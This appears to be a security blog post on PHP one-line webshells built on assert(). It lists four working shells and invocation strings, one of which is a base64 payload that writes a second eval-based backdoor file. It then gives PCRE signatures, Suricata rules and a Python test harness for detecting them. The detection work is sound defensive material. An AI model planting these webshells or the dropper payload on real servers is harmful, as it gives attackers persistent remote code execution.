Introduction
This post collects PHP one-line webshells ("一句话木马") that use assert(), and provides corresponding detection methods.
Case
1. <?php $_GET['a']($_GET['b']);?>
<?php $_POST['a']($_GET['b']);?>
<?php $_POST['a']($_POST['b']);?>
<?php $_GET['a']($_POST['b']);?>
?a=assert&b=phpinfo()
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
Decoded: a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
On Windows a warning/error message is displayed, and PHP 7.2 and later have disabled some dynamically called functions.
On Linux nothing is returned at all, whether the call succeeds or fails.
Regex matching
pcre:"/GET\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S]*=assert[^a-z][\s\S]*HTTP\/\d\.\d\x20200/i" Webshell.Assert.Http_Request.A
pcre:"/POST\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S\s]*\x0d\x0a[\S]*=assert[h\s&][\s\S]*HTTP\/\d\.\d\x20200/i" Webshell.Assert.Http_Body.A
alert http any any -> any any (msg:"WebShell.PHP.Assert().Threat.A"; flow:to_server,established; content:"GET"; nocase; http_method; content:".php?"; nocase; http_uri; content:"=assert"; http_uri; fast_pattern; nocase; pcre:"/\.php\?[\S\s]*=assert[^a-z]/Ui"; reference:url,https://mp.csdn.net/mdeditor/88645526; classtype:web-application-attack; sid:70000000; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)
alert http any any -> any any (msg:"WebShell.PHP.Assert().Threat.B"; flow:to_server,established; content:"POST"; nocase; http_method; content:".php"; nocase; http_uri; content:"=assert"; http_client_body; fast_pattern; nocase; pcre:"/=assert[&]?$/Pi"; reference:url,https://mp.csdn.net/mdeditor/88645526; classtype:web-application-attack; sid:70000001; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)
File: "/2018 - Work/研究测试-2019/PHP/assert/1/assert_Windows-PHP-5.5.pcap"
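As an added example (not code from the original post), the two PCRE signatures above and the body pcre from Suricata rule B are run in Python over constructed request/response flows; the host name, parameter values and flows are made-up sample data, and the code assumes each flow is one reassembled request followed by its response.

```python
import re

# The two PCRE signatures quoted on the page, compiled with Python's re module
# (\x20, \x0d\x0a, [\S], [\s\S] and the /i flag mean the same in re and PCRE).
SIGNATURES = {
    "Webshell.Assert.Http_Request.A": re.compile(
        r"GET\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S]*=assert[^a-z][\s\S]*HTTP\/\d\.\d\x20200", re.I),
    "Webshell.Assert.Http_Body.A": re.compile(
        r"POST\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S\s]*\x0d\x0a[\S]*=assert[h\s&][\s\S]*HTTP\/\d\.\d\x20200", re.I),
}
# The pcre from Suricata rule B; its /P modifier restricts it to the client body, so it is applied to the body alone.
BODY_PCRE_B = re.compile(r"=assert[&]?$", re.I)


def match_signatures(flow: str) -> list:
    """Names of the signatures that fire on one reassembled request+response
    flow. Both PCREs end in HTTP/x.y 200, so they need the response status line."""
    return [name for name, rx in SIGNATURES.items() if rx.search(flow)]


def body_pcre_fires(body: str) -> bool:
    """Rule B's pcre against a request body: the trailing $ means the body must
    end with =assert or =assert&, so parameter order decides whether it fires."""
    return BODY_PCRE_B.search(body) is not None


# Constructed sample flows: the request followed by the start of its response.
GET_FLOW = (
    "GET /a.php?a=assert&b=phpinfo() HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
)
POST_FLOW = (
    "POST /a.php HTTP/1.1\r\nHost: www.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 20\r\n\r\n"
    "a=assert&b=phpinfo()\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
)
# Looks similar on the wire, but the value is a longer word, not the bare function name.
BENIGN_FLOW = (
    "GET /index.php?page=assertions HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
    "HTTP/1.1 200 OK\r\n\r\n"
)
# Same request as POST_FLOW but answered with 404: neither signature fires.
POST_FLOW_404 = POST_FLOW.replace("HTTP/1.1 200 OK", "HTTP/1.1 404 Not Found")
```

Because both flow-level PCREs require the 200 status line, they only fire when the request and response are inspected together; a request the server rejected produces no alert from them.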